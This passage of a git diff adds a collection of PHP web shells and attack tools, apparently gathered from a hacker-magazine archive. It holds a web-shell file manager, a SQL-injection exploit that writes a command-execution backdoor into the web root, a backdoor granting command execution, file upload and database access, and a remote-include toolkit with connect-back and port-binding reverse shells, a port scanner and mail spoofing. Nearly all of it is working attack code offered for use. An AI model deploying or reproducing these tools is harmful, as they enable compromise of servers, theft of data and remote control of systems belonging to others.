+$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+for($i=0; $i<count($files); $i++){
+
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+echo $copyr;
+
+?>
+<!-- Network security team :: nst.void.ru -->
\ No newline at end of file
diff --git a/xakep-shells/PHP/pHpINJ.php.php.txt b/xakep-shells/PHP/pHpINJ.php.php.txt
new file mode 100644
index 0000000..b54acc6
--- /dev/null
+++ b/xakep-shells/PHP/pHpINJ.php.php.txt
@@ -0,0 +1,37 @@
+<?php
+?>
+<html>
+<head>
+<title>|| .::News Remote PHP Shell Injection::. ||   </title>
+</head>
+<body>
+<header>||   .::News PHP Shell Injection::.   ||</header> <br /> <br />
+<?php
+if (isset($_POST['url'])) {
+$url = $_POST['url'];
+$path2news = $_POST['path2news'];
+$outfile = $_POST ['outfile'];
+$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
+$sql = urlencode($sql);
+$expurl= $url."?id=".$sql ;
+echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
+echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
+}
+else
+{
+?>
+Url to index.php: <br /> 
+<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
+<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
+Server Path to Shell: <br />
+Full server path to a writable file which will contain the Php Shell <br />
+<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
+<input type = "submit" value = "Create Exploit"> <br /> <br />
+
+
+
+<?php
+}
+?>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/php-backdoor.php.txt b/xakep-shells/PHP/php-backdoor.php.txt
new file mode 100644
index 0000000..7defd37
--- /dev/null
+++ b/xakep-shells/PHP/php-backdoor.php.txt
@@ -0,0 +1,71 @@
+<?
+// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
+
+ob_implicit_flush();
+if(isset($_REQUEST['f'])){
+        $filename=$_REQUEST['f'];
+        $file=fopen("$filename","rb");
+        fpassthru($file);
+        die;
+}
+if(isset($_REQUEST['d'])){
+        $d=$_REQUEST['d'];
+        echo "<pre>";
+        if ($handle = opendir("$d")) {
+        echo "<h2>listing of $d</h2>";
+                   while ($dir = readdir($handle)){ 
+                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
+							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
+                       echo "$dir\n"; 
+                       echo "</font></a>";
+                }
+                       
+        } else echo "opendir() failed";
+        closedir($handle);
+        die ("<hr>"); 
+}
+if(isset($_REQUEST['c'])){
+	echo "<pre>";
+	system($_REQUEST['c']);		   
+	die;
+}
+if(isset($_REQUEST['upload'])){
+
+		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
+			else $dir=$_REQUEST['dir'];
+		$fname=$HTTP_POST_FILES['file_name']['name'];
+		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
+			die('file uploading error.');
+}
+if(isset($_REQUEST['mquery'])){
+	
+	$host=$_REQUEST['host'];
+	$usr=$_REQUEST['usr'];
+	$passwd=$_REQUEST['passwd'];
+	$db=$_REQUEST['db'];
+	$mquery=$_REQUEST['mquery'];
+	mysql_connect("$host", "$usr", "$passwd") or
+    die("Could not connect: " . mysql_error());
+    mysql_select_db("$db");
+    $result = mysql_query("$mquery");
+	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
+    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
+    mysql_free_result($result);
+	die;
+}
+?>
+<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
+<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
+upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
+<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
+<br>for example:
+http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
+or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
+<hr>execute mysql query:
+<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
+host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
+
+database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
+</form>
+
+<!--	http://michaeldaw.org	2006 	-->
diff --git a/xakep-shells/PHP/php-include-w-shell.php.txt b/xakep-shells/PHP/php-include-w-shell.php.txt
new file mode 100644
index 0000000..2b4b74a
--- /dev/null
+++ b/xakep-shells/PHP/php-include-w-shell.php.txt
@@ -0,0 +1,1312 @@
+<?php
+######################################################################
+# we decide if we want syslogging
+closelog();
+######################################################################
+# define variables
+######################################################################
+
+# error_reporting(E_ALL);
+error_reporting(0);
+
+# get globals even if register_globals is off
+import_globals();
+
+$safe_mode = ini_get('safe_mode');
+$register_globals = ini_get('register_globals');
+$magic_quotes_gpc = ini_get('magic_quotes_gpc');
+$txt['en']['on']="on";
+$txt['en']['off']="off";
+$txt['de']['on']="an";
+$txt['de']['off']="aus";
+$lang="en";
+
+if($safe_mode == 1) $SM = $txt[$lang]['on'];
+else { 
+	$SM = $txt[$lang]['off'];
+	# set_time_limit(9000);
+}
+if($register_globals == 1) $RG = $txt[$lang]['on'];
+else $RG = $txt[$lang]['off'];
+if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on'];
+else $MQ = $txt[$lang]['off'];
+
+# navigatable functions
+$ArrFuncs = array(
+	"dropinc"	=> 0,
+	"filecopy"	=> 0,
+	"fileedit"	=> 0,
+	"showsource"	=> 0,
+	"snoop"		=> 0,
+	"cmdln"		=> 0,
+	"connectback"	=> 0,
+	"phpshell"	=> 0,
+	"servicecheck"	=> 0,
+	"mysqlaccess"	=> 0,
+	"mail"		=> 0,
+	"env"		=> 0,
+	"phpenv"	=> 0,
+	"phpinfo"	=> 0,
+	"dumpvars"	=> 0,
+	"debugscript"	=> 0,
+	"syslog"	=> 0
+);
+
+# init navigation
+foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val;
+
+
+
+# set default values
+$ArrDefaults = array(
+	"filecopy_source" => "http://...",
+	"filecopy_dest" => getcwd(),
+	"cmdcall" => "",
+	"editfile" => getcwd(),
+	"editcontent" => "",
+	"chdir" => ".",
+	"vsource" => $SCRIPT_FILENAME,
+	"mail_from" => "attacker@0wned.org",
+	"mail_to" => "",
+	"mail_subject" => "", 
+	"mail_attach_source"  => "http://....",
+	"mail_attach_appear"  => "filename...",
+	"mail_content_type"   => "image/png",
+	"mail_msg" => "",
+	"tcpports" => "21 22 23 25 80 110",
+	"timeout" => 5,
+	"miniinc_loc" => getcwd() . "/miniinc.php",
+	"incdbhost" => "localhost",
+	"cbhost" => $_SERVER['REMOTE_ADDR'],
+	"cbport" => 20202,
+	"cbtempdir" => "/tmp",
+	"cbcompiler" => "gcc",
+	"phpshellapp" => "export TERM=xterm; bash -i",
+	"phpshellhost" => "0.0.0.0",
+	"phpshellport" => "20202"
+);
+
+# init defaults
+foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val;
+
+# define executable functions
+$Mstr = array(
+	0 => "No execute functions available!",
+	1 => "passthru()",
+	2 => "system()",
+	3 => "backticks",
+	4 => "proc_open()",
+	5 => "exec()"
+);
+
+# clean request to avoid uri monster
+$SREQ = "";
+$reqdat = array();
+$tmpCount=0;
+foreach($REQUESTS as $key => $val){
+	if($tmpCount==0) $reqdat[] = $key."=".$val;
+	else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val;
+	$tmpCount++;
+}
+$SREQ = implode("&", $reqdat);
+$tmpCount=0;
+if($SREQ=="") {
+	$tmp_req = array();
+	$tmp_qry = explode("&", $QUERY_STRING);
+	foreach($tmp_qry as $key => $val) {
+		$tmp_val = explode("=", $val);
+		if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1];
+		$tmpCount++;
+	}
+	$SREQ = implode("&", $tmp_req);
+}
+
+if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot'];
+
+# set some defaults to avaoid errors
+$is_file   = array();
+$is_dir    = array();
+$is_w_dir  = array();
+$is_w_file = array();
+$emeth=0;
+if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/";
+$chdir = str_replace("//", "/", $chdir);
+if(substr($chdir, -1) != "/") $chdir .= "/";
+##
+# Setup wether to use PHP_SELF or SCRIPT_NAME
+if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF;
+else $MyLoc = $SCRIPT_NAME;
+
+# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc;
+$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc;
+
+# This is a list of internal inc.inc vars that do not get displayed 
+# inside the dumpvars function (poss for a debug func later?)
+$DebugArr = array(
+	'ARHGFDGFGASDFG',
+	'safe_mode',
+	'register_globals',
+	'magic_quotes_gpc',
+	'txt',
+	'lang',
+	'SM',
+	'RG',
+	'MQ',
+	'ArrFuncs',
+	'val',
+	'key',
+	'env',
+	'phpenv',
+	'phpinfo',
+	'debugscript',
+	'filecopy',
+	'fileedit',
+	'showsource',
+	'snoop',
+	'mail',
+	'cmdln',
+	'syslog',
+	'servicecheck',
+	'dropinc',
+	'mysqlaccess',
+	'ArrDefaults',
+	'filecopy_source',
+	'filecopy_dest',
+	'cmdcall',
+	'editfile',
+	'editcontent',
+	'chdir',
+	'vsource',
+	'mail_from',
+	'mail_to',
+	'mail_subject',
+	'mail_attach_source',
+	'mail_attach_appear',
+	'mail_content_type',
+	'mail_msg',
+	'tcpports',
+	'timeout',
+	'miniinc_loc',
+	'incdbhost',
+	'Mstr',
+	'SREQ',
+	'reqdat',
+	'tmpCount',
+	'is_file',
+	'is_dir',
+	'is_w_dir',
+	'is_w_file',
+	'emeth',
+	'MyLoc',
+	'dumpvarsare',
+	'DebugArr',
+	'cbtempdir',
+	'cbcompiler',
+	'cbhost',
+	'cbport',
+	'phpshelltype',
+	'phpshellapp',
+	'phpshellhost',
+	'phpshellport'
+);
+
+
+# activate syslog entry
+if($syslog == 1)
+{
+#	openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0);
+#	drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)");
+}
+###############################################################################
+#
+# start include output 
+#
+###############################################################################
+$strOutput = "";
+$strOutput .= "<html><body bgcolor='#ffffff'>
+<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'>
+<center>
+<h2>Include tool</h2>
+PHP Version: " . phpversion() . " | 
+safe_mode: $SM |
+register_globals: $RG | 
+magic_quotes_gpc: $MQ | 
+syslogging: ";
+if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on'];
+$strOutput .= "
+<br><br>
+</center>
+<font color='#000000'>";
+foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); 
+
+###############################################################################
+# test cmd shell environment
+###############################################################################
+if($env == 1) { 
+	$strOutput .= "
+	<table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr>
+	<tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>";
+	if($emeth==0) { 
+		$strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>";
+	} else {
+		$strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr>
+		<tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr>
+		<tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr>
+		</table>";
+	}
+}
+
+###############################################################################
+# test php environment
+###############################################################################
+if($phpenv == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr>
+		<tr><td colspan=2>posix infos</td><tr>";
+		if(function_exists('posix_uname')) {
+			$posix_uname = posix_uname();
+			while (list($info, $value) = each ($posix_uname)) {
+				$strOutput .= "<tr><td>$info</td><td>$value</td></tr>";
+			}
+		} else {
+			$strOutput .= "posix_uname not available";
+		}
+		$strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>";
+		if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>";
+		else $strOutput .= "posix_getuid not available";
+		if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>";
+		else $strOutput .= "posix_geteuid not available";
+		if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>";
+		else $strOutput .= "posix_getgid not available";
+	$strOutput .= "</table>";
+}
+
+
+###############################################################################
+# dump variables
+###############################################################################
+if($dumpvars == 1) {
+	$strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr>
+	<tr><td>" . dd("GLOBALS") . "</td></tr>
+	</table>";
+}
+###############################################################################
+# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($debugscript == 1) { ?>
+	<table border=1><tr><td><h3>debug script</h3></td></tr>
+	<tr><td>
+	<? ddb("DebugArr"); ?>
+	</td></tr>
+	</table>
+<? }
+###############################################################################
+# copy file
+###############################################################################
+if($filecopy == 1) { 
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr>
+	<form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr>
+	<tr><td>destination</td><td><input type=text name='filecopy_dest'  value='" . $filecopy_dest . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# edit file
+###############################################################################
+if($fileedit == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr>
+	<tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr>
+	<tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; 
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= show_file($editfile);
+	$strOutput .= "</textarea></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($edit==1 | $editfile!=$ArrDefaults['editfile'])
+		$strOutput .= edit_file($editcontent,$editfile,$edit);
+ 	$strOutput .= "</td></tr>
+	</table>
+	</form>";
+}
+###############################################################################
+# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!!
+###############################################################################
+if($cmdln == 1) {
+	$emeth = test_cmd_shell();
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr>
+	<tr><td colspan=2>";
+	if($emeth < 3) {
+		$strOutput .= "The output of this command will be somewhere on the page!";
+		Mexec($cmdcall, $emeth);
+	} else {
+		$strOutput .= Mexec($cmdcall, $emeth);
+	}
+	$strOutput .= "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# sending mime mail
+###############################################################################
+if($mail == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr>
+	<tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr>
+	<tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr>
+	<tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr>
+	<tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr>
+	<tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr>
+	<tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr>
+	</form>
+	</table>";
+}
+
+###############################################################################
+# drop mini inc handling
+###############################################################################
+if($dropinc == 1) { 
+	if($loc!="") $miniinc_loc = $loc;
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr>
+	<tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+	if($minisave==1) $strOutput .= dropminiinc($miniinc_loc);
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+} 
+###############################################################################
+# connect C back shell handling
+###############################################################################
+if($connectback == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr>
+	<tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+###############################################################################
+# PHP shell handling
+###############################################################################
+if($phpshell == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr>
+	<tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr>
+	<tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr>
+	<tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr>
+	<tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>";
+	if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost);
+	$strOutput .= "</td></tr></form></table>";
+}
+
+
+###############################################################################
+# snooping
+###############################################################################
+if($snoop == 1) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr>
+	<tr><td colspan=2>" . snoopy($chdir) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show highlited source
+###############################################################################
+if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) {
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr>
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# service check
+###############################################################################
+if($servicecheck == 1) {
+if($servhost!="") $host = $servhost;
+else $host = "localhost";
+
+	$strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr>
+	<form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'>
+	<tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr>
+	<tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr>
+	<tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr>
+	<!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr -->
+	<tr><td></td><td><input type=submit></td></tr>
+	<tr><td colspan=2><pre>";
+
+	$hosts = explode(" ", $host);
+	$port = explode(" ",$tcpports);
+	$values = count($port);
+	$numhosts = count($hosts);
+	if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n";
+	else if($values > 1) $strOutput .= "Checking $values ports..\n";
+	else $strOutput .= "No ports specified!!\n";
+	if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n";
+	else if($numhosts == 1) $strOutput .= "On 1 host..\n";
+	else $strOutput .= "No hosts specified!!\n";
+	if($numhosts >= 1) {
+		for($hcount=0; $hcount < $numhosts; $hcount++) {
+			$tmphost = $hosts[$hcount];
+			$strOutput .= "\nTesting $tmphost..\n";
+			if(($values == 1 && $port[0] != "") | $values > 1) {
+				for ($cont=0; $cont < $values; $cont++) {
+					@$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout);
+					$service = getservbyport($port[$cont],"tcp");
+					@$get = fgets($sock[$cont]);
+					if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n";
+					flush();
+				}
+			}
+		}
+	}
+	$strOutput .= "</pre></td></tr>
+	</form>
+	</table>";
+}
+###############################################################################
+# show phpinfo
+###############################################################################
+if($phpinfo == 1){ 
+	phpinfo();
+}
+######################################################################
+# db stuff
+######################################################################
+if($mysqlaccess == 1) {
+	$strOutput .= "<table border=1>
+	<form method='post' target='_parent' action='$MyLoc?$SREQ&'>
+	<tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr>
+	<tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr>
+	<tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr>
+	<tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr>
+	<tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr>
+	<tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr>
+	<tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr>
+	<!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr -->
+	<tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr>
+	</table>";
+}
+
+if($incdbhost!="" && $incdbuser!="") {
+	if($incdbvar!="") $dbh = $incdbhost;
+	else $dbH = $incdbhost;
+	$dbu = $incdbuser;
+	$dbp = $incdbpass;
+	if($incdbsql!="") $dbs = $incdbsql;
+	if($incdbname!="") $dbn = $incdbname;
+	if($incdbtable!="") $dbt = $incdbtable;
+	if($incdbfile!="") $dumpfile = $incdbfile;
+}
+
+if(isset($dbh)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>";
+	eval("\$Gdbhost = \"\$$dbh\";");
+	eval("\$Gdbuser = \"\$$dbu\";");
+	eval("\$Gdbpass = \"\$$dbp\";");
+	eval("\$Gdbname = \"\$$dbn\";");
+	$strOutput .= "<tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass .
+		"</td></tr><tr><td>" .
+		display_dbs($Gdbhost, $Gdbuser, $Gdbpass);
+	} else if(isset($dbs)) {
+		$Gdbsql = $dbs;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . 
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile);
+		} else {
+			$strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql);
+		}
+	} else if(isset($dbt)) {
+		$Gdbtabl = $dbt;
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl);
+		}
+	} else {
+		$strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname .
+		"</td></tr><tr><td>" .
+		display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname);
+	}
+	$strOutput .= "</pre></td></tr></table><br/>";
+}
+
+if(isset($dbH)) {
+	$strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>";
+	if($dbn=="") {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp.
+		"</td></tr><tr><td>".
+		display_dbs($dbH, $dbu, $dbp);
+	} else if(isset($dbs)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs.
+		"</td></tr><tr><td>";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile);
+		} else {
+			$strOutput .= display_query($dbH, $dbu, $dbp, $dbn, $dbs);
+		}
+	} else if(isset($dbt)) {
+		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt;
+		if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile;
+		$strOutput .= "</td></tr><tr><td> ";
+		if(isset($dumpfile)) {
+			$strOutput .= dump_rows($dbH, $dbu, $dbp, $dbn, $dbt, $dumpfile);		
+		} else {
+			$strOutput .= display_rows($dbH, $dbu, $dbp, $dbn, $dbt);
+		}
